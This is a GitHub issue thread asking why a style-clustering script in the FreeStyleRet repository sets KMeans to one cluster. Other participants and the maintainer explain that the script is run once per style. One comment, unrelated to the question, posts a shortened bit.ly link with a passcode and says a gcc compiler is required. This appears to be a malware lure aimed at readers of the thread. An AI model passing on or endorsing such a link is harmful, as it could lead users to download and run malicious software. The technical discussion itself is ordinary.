### ISSUE TITLE
A question for Style Space Construction Module

### ISSUE THREAD

**Issue by NEU-rzh** [CuriseJia/FreeStyleRet#35]
A great work!

While reviewing the style space construction module implementation in src/dataset/gen_cluster.py, I found that the KMeans clustering is currently configured to use only one cluster center (n_clusters=1). This setting reduces the clustering to a single average representation, which contrasts with the paper's description of generating four distinct style-specific basis.

Here is the relevant code of Style Space Construction Module:
```
for file in tqdm(filelist):
    path = root_path + 'sketch/' + file['image']
    img = process(Image.open(path)).unsqueeze(0).to('cuda:0')
    feat = model._get_gram_prompt(img)  # (1, 4, 1024)
    embed.append(feat.detach().cpu())

feature = torch.stack(embed, dim=0).squeeze(1).detach().numpy()

np.save('gram_cluster/sketch.npy', feature)

kmeans = KMeans(n_clusters=1)

kmeans.fit(feature)

cluster_labels = kmeans.labels_

cluster_centers = kmeans.cluster_centers_

cluster_tensor = np.mean(cluster_centers, axis=0)
cluster_tensor = cluster_tensor.reshape((1, 4096))

np.save('sketch_cluster.npy', cluster_tensor)
```

My main confusion lies in the choice of n_clusters=1. It's unclear why only one cluster center is used when the paper explicitly mentions the creation of a style space based on multiple style-specific bases.

Looking forward to your insights on this matter.
﻿
Best regards,

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by JoeFannie** [comment]
It seems that this script produces one center instead of four centers at once. For instance, it only produces the center of sketch style if the dataset root targeting at the sketch data. Therefore, the script should be run for four times to obtain four style centers.

**Comment by CuriseJia** [comment]
Thank you for your issue. Joe is right, you need to generate four or more style center by running the script multiple times. We have released the dataset and the whole process code, you can test it yourself and issue again if have any other questions.
Best regards!
